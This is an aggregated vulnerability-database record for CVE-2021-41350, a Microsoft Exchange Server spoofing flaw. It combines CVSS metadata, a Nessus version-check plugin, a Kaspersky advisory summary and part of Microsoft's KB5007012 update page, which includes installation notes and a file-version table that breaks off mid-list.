ID CVE-2021-41350
Type cve
Reporter secure@microsoft.com
Modified 2021-10-19T18:03:00
Description
Microsoft Exchange Server Spoofing Vulnerability
{"id": "CVE-2021-41350", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-41350", "description": "Microsoft Exchange Server Spoofing Vulnerability", "published": "2021-10-13T01:15:00", "modified": "2021-10-19T18:03:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "accessVector": "NETWORK", "accessComplexity": "MEDIUM", "authentication": "NONE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE", "baseScore": 4.3}, "severity": "MEDIUM", "exploitabilityScore": 8.6, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": true}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-41350", "reporter": "secure@microsoft.com", "references": ["https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-41350"], "cvelist": ["CVE-2021-41350"], "immutableFields": [], "lastseen": "2022-03-23T19:16:58", "viewCount": 43, "enchantments": {"dependencies": {"references": [{"type": "avleonov", "idList": ["AVLEONOV:99215B2D7808C46D8762AD712CD3D267"]}, {"type": "kaspersky", "idList": ["KLA12314"]}, {"type": "mscve", "idList": ["MS:CVE-2021-41350"]}, {"type": "mskb", "idList": ["KB5007012"]}, {"type": "nessus", "idList": ["SMB_NT_MS21_OCT_EXCHANGE.NASL"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:73EAE8A2825E9B6764F314122B4E5F25"]}], "rev": 4}, "score": {"value": 2.2, "vector": "NONE"}, "backreferences": {"references": [{"type": "avleonov", "idList": ["AVLEONOV:99215B2D7808C46D8762AD712CD3D267"]}, {"type": "kaspersky", "idList": ["KLA12314"]}, {"type": "mscve", "idList": ["MS:CVE-2021-41350"]}, {"type": "mskb", "idList": ["KB5007012"]}, {"type": "nessus", "idList": ["SMB_NT_MS21_OCT_EXCHANGE.NASL"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:73EAE8A2825E9B6764F314122B4E5F25"]}]}, "exploitation": null, "vulnersScore": 2.2}, "_state": {"dependencies": 0, "score": 0}, "_internal": {}, "cna_cvss": {"cna": null, "cvss": {}}, "cpe": ["cpe:/a:microsoft:exchange_server:2016", "cpe:/a:microsoft:exchange_server:2019"], "cpe23": ["cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_10:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_11:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_21:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_22:*:*:*:*:*:*"], "cwe": ["NVD-CWE-noinfo"], "affectedSoftware": [{"cpeName": "microsoft:exchange_server", "version": "2016", "operator": "eq", "name": "microsoft exchange server"}, {"cpeName": "microsoft:exchange_server", "version": "2016", "operator": "eq", "name": "microsoft exchange server"}, {"cpeName": "microsoft:exchange_server", "version": "2019", "operator": "eq", "name": "microsoft exchange server"}, {"cpeName": "microsoft:exchange_server", "version": "2019", "operator": "eq", "name": "microsoft exchange server"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_21:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_22:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_10:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_11:*:*:*:*:*:*", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-41350", "name": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-41350", "refsource": "MISC", "tags": ["Patch", "Vendor Advisory"]}]}
{"mscve": [{"lastseen": "2021-12-06T18:18:29", "description": "Microsoft Exchange Server Spoofing Vulnerability \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 4.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 1.4}, "published": "2021-10-12T07:00:00", "type": "mscve", "title": "Microsoft Exchange Server Spoofing Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41350"], "modified": "2021-10-12T07:00:00", "id": "MS:CVE-2021-41350", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-41350", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "nessus": [{"lastseen": "2022-01-27T12:49:18", "description": "The Microsoft Exchange Server installed on the remote host is missing security updates. It is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26427) \n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges. (CVE-2021-41348) \n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2021-41350)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-34453)", "cvss3": {"score": 9.6, "vector": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"}, "published": "2021-10-15T00:00:00", "type": "nessus", "title": "Security Updates for Exchange (October 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26427", "CVE-2021-34453", "CVE-2021-41348", "CVE-2021-41350"], "modified": "2022-01-26T00:00:00", "cpe": ["cpe:/a:microsoft:exchange_server"], "id": "SMB_NT_MS21_OCT_EXCHANGE.NASL", "href": "https://www.tenable.com/plugins/nessus/154175", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(154175);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/26\");\n\n script_cve_id(\n \"CVE-2021-26427\",\n \"CVE-2021-34453\",\n \"CVE-2021-41348\",\n \"CVE-2021-41350\"\n );\n script_xref(name:\"MSKB\", value:\"5007011\");\n script_xref(name:\"MSKB\", value:\"5007012\");\n script_xref(name:\"MSFT\", value:\"MS21-5007011\");\n script_xref(name:\"MSFT\", value:\"MS21-5007012\");\n script_xref(name:\"IAVA\", value:\"2021-A-0466-S\");\n\n script_name(english:\"Security Updates for Exchange (October 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Microsoft Exchange Server installed on the remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Microsoft Exchange Server installed on the remote host is missing security updates. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute \n unauthorized arbitrary commands. (CVE-2021-26427)\n \n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges. (CVE-2021-41348)\n \n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of \n another user. (CVE-2021-41350)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny\n system or application services. (CVE-2021-34453)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5007011\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5007012\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released the following security updates to address this issue: \n -KB5007011\n -KB5007012\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-26427\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/10/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/10/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/10/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:exchange_server\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ms_bulletin_checks_possible.nasl\", \"microsoft_exchange_installed.nbin\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('vcf_extras_microsoft.inc');\n\nvar app_info = vcf::microsoft::exchange::get_app_info();\n\nvar constraints =\n[\n {\n 'product' : '2013', \n 'unsupported_cu' : 22, \n 'min_version': '15.0.1497.0', \n 'fixed_version': '15.0.1497.024',\n 'kb': '5007011'\n },\n {\n 'product' : '2016', \n 'unsupported_cu' : 19, \n 'min_version': '15.1.2308.0', \n 'fixed_version': '15.1.2308.15',\n 'kb': '5007012'\n },\n {\n 'product': '2016',\n 'unsupported_cu': 19,\n 'min_version': '15.1.2375.0',\n 'fixed_version': '15.1.2375.12',\n 'kb': '5007012'\n },\n {\n 'product' : '2019', \n 'unsupported_cu' : 8,\n 'min_version': '15.2.922.0',\n 'fixed_version': '15.2.922.14',\n 'kb': '5007012'\n },\n {\n 'product' : '2019', \n 'unsupported_cu' : 8,\n 'min_version': '15.2.986.0',\n 'fixed_version': '15.2.986.9',\n 'kb': '5007012'\n }\n];\n\nvcf::microsoft::exchange::check_version_and_report(\n app_info:app_info, \n bulletin:'MS21-10',\n constraints:constraints, \n severity:SECURITY_WARNING\n);\n", "cvss": {"score": 5.8, "vector": "AV:A/AC:L/Au:N/C:P/I:P/A:P"}}], "kaspersky": [{"lastseen": "2021-12-22T23:00:00", "description": "### *Detect date*:\n10/12/2021\n\n### *Severity*:\nHigh\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Exchange Server. Malicious users can exploit these vulnerabilities to gain privileges, spoof user interface, execute arbitrary code, cause denial of service.\n\n### *Affected products*:\nMicrosoft Exchange Server 2013 Cumulative Update 23 \nMicrosoft Exchange Server 2019 Cumulative Update 11 \nMicrosoft Exchange Server 2019 Cumulative Update 10 \nMicrosoft Exchange Server 2016 Cumulative Update 22 \nMicrosoft Exchange Server 2016 Cumulative Update 21\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2021-41348](<https://nvd.nist.gov/vuln/detail/CVE-2021-41348>) \n[CVE-2021-41350](<https://nvd.nist.gov/vuln/detail/CVE-2021-41350>) \n[CVE-2021-26427](<https://nvd.nist.gov/vuln/detail/CVE-2021-26427>) \n[CVE-2021-34453](<https://nvd.nist.gov/vuln/detail/CVE-2021-34453>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Exchange Server](<https://threats.kaspersky.com/en/product/Microsoft-Exchange-Server/>)\n\n### *KB list*:\n[5007011](<http://support.microsoft.com/kb/5007011>) \n[5007012](<http://support.microsoft.com/kb/5007012>)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.6, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-10-12T00:00:00", "type": "kaspersky", "title": "KLA12314 Multiple vulnerabilities in Microsoft Exchange Server", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26427", "CVE-2021-34453", "CVE-2021-41348", "CVE-2021-41350"], "modified": "2021-10-14T00:00:00", "id": "KLA12314", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12314/", "cvss": {"score": 5.8, "vector": "AV:A/AC:L/Au:N/C:P/I:P/A:P"}}], "mskb": [{"lastseen": "2022-05-12T14:50:03", "description": "None\nThis security update rollup resolves vulnerabilities in Microsoft Exchange Server. To learn more about these vulnerabilities, see the following Common Vulnerabilities and Exposures (CVE):\n\n * [CVE-2021-26427 | Microsoft Exchange Server Remote Code Execution Vulnerability](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-26427>)\n * [CVE-2021-34453 | Microsoft Exchange Server Denial of Service Vulnerability](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2021-34453>)\n * [CVE-2021-41348 | Microsoft Exchange Server Elevation of Privilege Vulnerability](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2021-41348>)\n * [CVE-2021-41350 | Microsoft Exchange Server Spoofing Vulnerability](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2021-41350>)\n\n## Improvements in this update\n\n * The Exchange Server version number is now added to the HTTP response reply header. You can use this information to verify the security update status of Exchange-based servers in your network.\n\n## Known issues in this update\n\n * **Issue 1** \n \nWhen you try to manually install this security update by double-clicking the update file (.msp) to run it in Normal mode (that is, not as an administrator), some files are not correctly updated.When this issue occurs, you don\u2019t receive an error message or any indication that the security update was not correctly installed. However, Outlook Web Access (OWA) and the Exchange Control Panel (ECP) might stop working. \n \nThis issue occurs on servers that are using User Account Control (UAC). The issue occurs because the security update doesn\u2019t correctly stop certain Exchange-related services.\n\n**Note: **This issue does not occur if you install the update through Microsoft Update.\n\nTo avoid this issue, follow these steps to manually install this security update:\n 1. Select **Start**, and type **cmd**.\n 2. In the results, right-click **Command Prompt**, and then select **Run as administrator**.\n 3. If the **User Account Control** dialog box appears, verify that the default action is the action that you want, and then select **Continue**.\n 4. Type the full path of the .msp file, and then press Enter.\n * **Issue 2** \n \nExchange services might remain in a disabled state after you install this security update. This condition does not indicate that the update is not installed correctly. This condition might occur if the service control scripts experience a problem when they try to return Exchange services to their usual state. \n \nTo fix this issue, use Services Manager to restore the startup type to **Automatic**, and then start the affected Exchange services manually. To avoid this issue, run the security update at an elevated command prompt. For more information about how to open an elevated Command Prompt window, see [Start a Command Prompt as an Administrator](<https://technet.microsoft.com/en-us/library/cc947813\\(v=ws.10\\).aspx>).\n * **Issue 3** \n \nWhen you block third-party cookies in a web browser, you might be continually prompted to trust a particular add-in even though you keep selecting the option to trust it. This issue occurs also in privacy window modes (such as InPrivate mode in Microsoft Edge). This issue occurs because browser restrictions prevent the response from being recorded. To record the response and enable the add-in, you must enable third-party cookies for the domain that's hosting OWA or Office Online Server in the browser settings. To enable this setting, refer to the specific support documentation for the browser.\n * **Issue 4** \n \nWhen you try to request free/busy information for a user in a different forest in a trusted cross-forest topology, the request fails and generates a \"(400) Bad Request\" error message. For more information and workarounds to this issue, see [\"(400) Bad Request\" error during Autodiscover for per-user free/busy in a trusted cross-forest topology](<https://support.microsoft.com/help/5003623>).\n\n## How to get and install the update\n\n### Method 1: Microsoft Update\n\nThis update is available through Windows Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to turn on automatic updating, see [Windows Update: FAQ](<https://support.microsoft.com/help/12373/windows-update-faq>).\n\n### Method 2: Microsoft Update Catalog\n\nTo get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5007012>) website.\n\n### Method 3: Microsoft Download Center\n\nYou can get the standalone update package through the Microsoft Download Center.\n\n * [Download Security Update 1 for Exchange Server 2019 Cumulative Update 11 (KB5007012)](<https://www.microsoft.com/download/details.aspx?familyid=493ebadc-791f-43fc-b6da-349e9b227ef9>)\n * [Download Security Update 2 for Exchange Server 2019 Cumulative Update 10 (KB5007012)](<https://www.microsoft.com/download/details.aspx?familyid=5409b101-36fc-4e5c-82bc-d0f6068b2405>)\n * [Download Security Update 1 For Exchange Server 2016 Cumulative Update 22 (KB5007012)](<https://www.microsoft.com/download/details.aspx?familyid=2a8da394-c405-4cc7-aa58-e96aa19acd4f>)\n * [Download Security Update 2 for Exchange Server 2016 Cumulative Update 21 (KB5007012)](<https://www.microsoft.com/download/details.aspx?familyid=ffea3a31-7286-4932-867a-a38952c1efee>)\n\n## More information\n\n### Security update deployment information\n\nFor deployment information about this update, see [Security update deployment information: October 12, 2021](<https://support.microsoft.com/help/5006940>).\n\n### Security update replacement information\n\nThis security update replaces the following previously released updates:\n\n * [Description of the security update for Microsoft Exchange Server 2019: July 13, 2021 (KB5004780)](<https://support.microsoft.com/help/5004780>)\n * [Description of the security update for Microsoft Exchange Server 2016: July 13, 2021 (KB5004779)](<https://support.microsoft.com/help/5004779>)\n\n## File information\n\n### File hash information\n\nUpdate name| File name| | SHA256 hash \n---|---|---|--- \nExchange Server 2019 Cumulative Update 11| Exchange2019-KB5007012-x64-en.msp| | DAE6ACBA89C6DA145B8441FFDA4E3F07D8F237084E66D9E3F5513FB41A4BE8A1 \nExchange Server 2019 Cumulative Update 10| Exchange2019-KB5007012-x64-en.msp| | 4A1AD9C094DCB85DE8C6F2D81E638B135915EAC31BC8BFA1A64D0E788AA93EB5 \nExchange Server 2016 Cumulative Update 22| Exchange2016-KB5007012-x64-en.msp| | A7684636ED49456E1937AD81CD0A680FC6DFC43A60B9B85AE0BD4B5EB1AC837B \nExchange Server 2016 Cumulative Update 21| Exchange2016-KB5007012-x64-en.msp| | B9FF4BDD0BBD558EBDA68D5CB825A0C082C0C8735579156E3D68E0CAB1AD902D \n \n### Exchange server file information\n\nThe English (United States) version of this update installs files that have the attributes that are listed in the following tables. The dates and times for these files are listed in Coordinated Universal Time (UTC). The dates and times for these files on your local computer are displayed in your local time together with your current daylight-saving time (DST) bias. Additionally, the dates and times may change when you perform certain operations on the files.\n\n## \n\n__\n\nMicrosoft Exchange Server 2019 Cumulative Update 11\n\nFile name| File version| File size| Date| Time| Platform \n---|---|---|---|---|--- \nActivemonitoringeventmsg.dll| 15.2.986.9| 71,056| 29-Sep-21| 19:47| x64 \nActivemonitoringexecutionlibrary.ps1| Not applicable| 29,538| 29-Sep-21| 19:47| Not applicable \nAdduserstopfrecursive.ps1| Not applicable| 14,961| 29-Sep-21| 19:58| Not applicable \nAdemodule.dll| 15.2.986.9| 106,384| 29-Sep-21| 19:47| x64 \nAirfilter.dll| 15.2.986.9| 42,872| 29-Sep-21| 19:47| x64 \nAjaxcontroltoolkit.dll| 15.2.986.9| 92,552| 29-Sep-21| 19:48| x86 \nAntispamcommon.ps1| Not applicable| 13,501| 29-Sep-21| 19:44| Not applicable \nAsdat.msi| Not applicable| 5,087,232| 29-Sep-21| 19:48| Not applicable \nAsentirs.msi| Not applicable| 77,824| 29-Sep-21| 19:47| Not applicable \nAsentsig.msi| Not applicable| 73,728| 29-Sep-21| 19:47| Not applicable \nBigfunnel.bondtypes.dll| 15.2.986.9| 45,448| 29-Sep-21| 19:50| x86 \nBigfunnel.common.dll| 15.2.986.9| 66,424| 29-Sep-21| 19:44| x86 \nBigfunnel.configuration.dll| 15.2.986.9| 118,160| 29-Sep-21| 20:00| x86 \nBigfunnel.entropy.dll| 15.2.986.9| 44,424| 29-Sep-21| 19:47| x86 \nBigfunnel.filter.dll| 15.2.986.9| 54,152| 29-Sep-21| 19:50| x86 \nBigfunnel.indexstream.dll| 15.2.986.9| 69,000| 29-Sep-21| 19:50| x86 \nBigfunnel.neuraltree.dll| Not applicable| 694,152| 29-Sep-21| 19:44| x64 \nBigfunnel.neuraltreeranking.dll| 15.2.986.9| 19,848| 29-Sep-21| 19:58| x86 \nBigfunnel.poi.dll| 15.2.986.9| 243,592| 29-Sep-21| 19:44| x86 \nBigfunnel.postinglist.dll| 15.2.986.9| 188,808| 29-Sep-21| 19:52| x86 \nBigfunnel.query.dll| 15.2.986.9| 101,256| 29-Sep-21| 19:44| x86 \nBigfunnel.ranking.dll| 15.2.986.9| 109,440| 29-Sep-21| 19:58| x86 \nBigfunnel.syntheticdatalib.dll| 15.2.986.9| 3,634,560| 29-Sep-21| 19:58| x86 \nBigfunnel.tracing.dll| 15.2.986.9| 42,872| 29-Sep-21| 19:47| x86 \nBigfunnel.wordbreakers.dll| 15.2.986.9| 46,456| 29-Sep-21| 19:52| x86 \nCafe_airfilter_dll| 15.2.986.9| 42,872| 29-Sep-21| 19:47| x64 \nCafe_exppw_dll| 15.2.986.9| 83,336| 29-Sep-21| 19:48| x64 \nCafe_owaauth_dll| 15.2.986.9| 92,040| 29-Sep-21| 19:48| x64 \nCalcalculation.ps1| Not applicable| 42,093| 29-Sep-21| 19:44| Not applicable \nCheckdatabaseredundancy.ps1| Not applicable| 94,618| 29-Sep-21| 19:52| Not applicable \nChksgfiles.dll| 15.2.986.9| 57,232| 29-Sep-21| 19:52| x64 \nCitsconstants.ps1| Not applicable| 15,837| 29-Sep-21| 19:52| Not applicable \nCitslibrary.ps1| Not applicable| 82,696| 29-Sep-21| 19:52| Not applicable \nCitstypes.ps1| Not applicable| 14,496| 29-Sep-21| 19:52| Not applicable \nClassificationengine_mce| 15.2.986.9| 1,693,064| 29-Sep-21| 19:47| Not applicable \nClusmsg.dll| 15.2.986.9| 134,024| 29-Sep-21| 19:50| x64 \nCoconet.dll| 15.2.986.9| 47,992| 29-Sep-21| 19:47| x64 \nCollectovermetrics.ps1| Not applicable| 81,656| 29-Sep-21| 19:52| Not applicable \nCollectreplicationmetrics.ps1| Not applicable| 41,882| 29-Sep-21| 19:52| Not applicable \nCommonconnectfunctions.ps1| Not applicable| 29,943| 29-Sep-21| 21:46| Not applicable \nComplianceauditservice.exe| 15.2.986.9| 39,800| 29-Sep-21| 21:50| x86 \nConfigureadam.ps1| Not applicable| 22,796| 29-Sep-21| 19:59| Not applicable \nConfigurecaferesponseheaders.ps1| Not applicable| 20,340| 29-Sep-21| 19:58| Not applicable \nConfigurecryptodefaults.ps1| Not applicable| 42,035| 29-Sep-21| 19:44| Not applicable \nConfigurenetworkprotocolparameters.ps1| Not applicable| 19,802| 29-Sep-21| 19:58| Not applicable \nConfiguresmbipsec.ps1| Not applicable| 39,860| 29-Sep-21| 19:58| Not applicable \nConfigure_enterprisepartnerapplication.ps1| Not applicable| 22,315| 29-Sep-21| 19:58| Not applicable \nConnectfunctions.ps1| Not applicable| 37,137| 29-Sep-21| 21:46| Not applicable \nConnect_exchangeserver_help.xml| Not applicable| 30,412| 29-Sep-21| 21:46| Not applicable \nConsoleinitialize.ps1| Not applicable| 24,264| 29-Sep-21| 21:38| Not applicable \nConvertoabvdir.ps1| Not applicable| 20,085| 29-Sep-21| 19:58| Not applicable \nConverttomessagelatency.ps1| Not applicable| 14,564| 29-Sep-21| 19:58| Not applicable \nConvert_distributiongrouptounifiedgroup.ps1| Not applicable| 34,797| 29-Sep-21| 19:58| Not applicable \nCreate_publicfoldermailboxesformigration.ps1| Not applicable| 27,944| 29-Sep-21| 19:58| Not applicable \nCts.14.0.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 502| 29-Sep-21| 19:47| Not applicable \nCts.14.1.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 502| 29-Sep-21| 19:47| Not applicable \nCts.14.2.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 502| 29-Sep-21| 19:47| Not applicable \nCts.14.3.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 502| 29-Sep-21| 19:47| Not applicable \nCts.14.4.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 502| 29-Sep-21| 19:47| Not applicable \nCts.15.0.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 502| 29-Sep-21| 19:47| Not applicable \nCts.15.1.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 502| 29-Sep-21| 19:47| Not applicable \nCts.15.2.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 502| 29-Sep-21| 19:47| Not applicable \nCts.15.20.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 502| 29-Sep-21| 19:47| Not applicable \nCts.8.1.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 502| 29-Sep-21| 19:47| Not applicable \nCts.8.2.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 502| 29-Sep-21| 19:47| Not applicable \nCts.8.3.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 502| 29-Sep-21| 19:47| Not applicable \nCts_exsmime.dll| 15.2.986.9| 380,800| 29-Sep-21| 19:44| x64 \nCts_microsoft.exchange.data.common.dll| 15.2.986.9| 1,686,408| 29-Sep-21| 19:44| x86 \nCts_microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 502| 29-Sep-21| 19:47| Not applicable \nCts_policy.14.0.microsoft.exchange.data.common.dll| 15.2.986.9| 12,664| 29-Sep-21| 19:50| x86 \nCts_policy.14.1.microsoft.exchange.data.common.dll| 15.2.986.9| 12,680| 29-Sep-21| 19:50| x86 \nCts_policy.14.2.microsoft.exchange.data.common.dll| 15.2.986.9| 12,688| 29-Sep-21| 19:47| x86 \nCts_policy.14.3.microsoft.exchange.data.common.dll| 15.2.986.9| 12,688| 29-Sep-21| 19:48| x86 \nCts_policy.14.4.microsoft.exchange.data.common.dll| 15.2.986.9| 12,680| 29-Sep-21| 19:50| x86 \nCts_policy.15.0.microsoft.exchange.data.common.dll| 15.2.986.9| 12,680| 29-Sep-21| 19:47| x86 \nCts_policy.15.1.microsoft.exchange.data.common.dll| 15.2.986.9| 12,672| 29-Sep-21| 19:47| x86 \nCts_policy.15.2.microsoft.exchange.data.common.dll| 15.2.986.9| 12,680| 29-Sep-21| 19:52| x86 \nCts_policy.15.20.microsoft.exchange.data.common.dll| 15.2.986.9| 12,680| 29-Sep-21| 19:50| x86 \nCts_policy.8.0.microsoft.exchange.data.common.dll| 15.2.986.9| 12,680| 29-Sep-21| 19:47| x86 \nCts_policy.8.1.microsoft.exchange.data.common.dll| 15.2.986.9| 12,680| 29-Sep-21| 19:47| x86 \nCts_policy.8.2.microsoft.exchange.data.common.dll| 15.2.986.9| 12,688| 29-Sep-21| 19:50| x86 \nCts_policy.8.3.microsoft.exchange.data.common.dll| 15.2.986.9| 12,680| 29-Sep-21| 19:48| x86 \nDagcommonlibrary.ps1| Not applicable| 60,234| 29-Sep-21| 19:52| Not applicable \nDependentassemblygenerator.exe| 15.2.986.9| 22,392| 29-Sep-21| 19:47| x86 \nDiaghelper.dll| 15.2.986.9| 66,960| 29-Sep-21| 19:47| x86 \nDiagnosticscriptcommonlibrary.ps1| Not applicable| 16,366| 29-Sep-21| 19:52| Not applicable \nDisableinmemorytracing.ps1| Not applicable| 13,394| 29-Sep-21| 19:58| Not applicable \nDisable_antimalwarescanning.ps1| Not applicable| 15,221| 29-Sep-21| 19:58| Not applicable 